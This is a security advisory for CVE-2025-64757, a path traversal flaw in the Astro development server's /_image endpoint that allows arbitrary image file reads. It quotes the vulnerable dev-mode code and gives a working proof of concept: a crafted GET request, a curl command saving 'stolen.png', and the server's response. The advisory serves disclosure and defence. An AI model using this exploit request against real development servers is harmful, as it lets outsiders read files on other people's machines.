CVE-2025-64757
Astro Development Server has Arbitrary Local File Read
Description
### Summary A vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. ### Details - **Title**: Arbitrary Local File Read in Astro Development Image Endpoint - **Type**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - **Component**: `/packages/astro/src/assets/endpoint/node.ts` - **Affected Versions**: Astro v5.x development builds (confirmed v5.13.3) - **Attack Vector**: Network (HTTP GET request) - **Authentication Required**: None The vulnerability exists in the Node.js image endpoint handler used during development mode. The endpoint accepts an `href` parameter that specifies the path to an image file. In development mode, this parameter is processed without adequate path validation, allowing attackers to specify absolute file paths. **Vulnerable Code Location**: `packages/astro/src/assets/endpoint/node.ts` ```typescript // Vulnerable code in development mode if (import.meta.env.DEV) { fileUrl = pathToFileURL(removeQueryString(replaceFileSystemReferences(src))); } else { // Production has proper path validation // ... security checks omitted in dev mode } ``` The development branch bypasses the security checks that exist in the production code path, which validates that file paths are within the allowed assets directory. ### PoC #### Attack Prerequisites 1. Astro development server must be running (`astro dev`) 2. The `/_image` endpoint must be accessible to the attacker 3. Target image files must be readable by the Node.js process #### Exploit Steps 1. Start Astro Development Server: ```bash astro dev # Typically runs on http://localhost:4321 ``` 2. Craft Malicious Request: ```http GET /_image?href=/[ABSOLUTE_PATH_TO_IMAGE]&w=100&h=100&f=png HTTP/1.1 Host: localhost:4321 ``` 3. Example Attack: ```bash curl "http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png" -o stolen.png ``` #### Demonstration Results **Test Environment**: macOS with Astro v5.13.3 **Successful Exploitation**: - Target: `/System/Library/Image Capture/Automatic Tasks/MakePDF.app/Contents/Resources/0blank.jpg` - Response: HTTP 200 OK, Content-Type: image/png - Exfiltration: 303 bytes (100x100 PNG) - File Created: `stolen-image.png` containing processed system image **Attack Payload**: ``` http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png ``` **Server Response**: ``` Status: 200 OK Content-Type: image/png Content-Length: 303 ``` ### Impact #### Confidentiality Impact: HIGH - **Scope**: Any image file readable by the Node.js process - **Exfiltration Method**: Complete file contents via HTTP response (transformed to PNG) #### Integrity Impact: NONE - The vulnerability only allows reading files, not modification #### Availability Impact: NONE - No direct impact on system availability - Potential for resource exhaustion through repeated large image requests ### Affected Components #### Primary Component - **File**: `packages/astro/src/assets/endpoint/node.ts` - **Function**: `loadLocalImage()` - **Lines**: Development mode branch (~25-35) #### Secondary Components - **File**: `packages/astro/src/assets/endpoint/generic.ts` - **Impact**: Uses different code path, not directly vulnerable - **Note**: Implements proper remote allowlist validation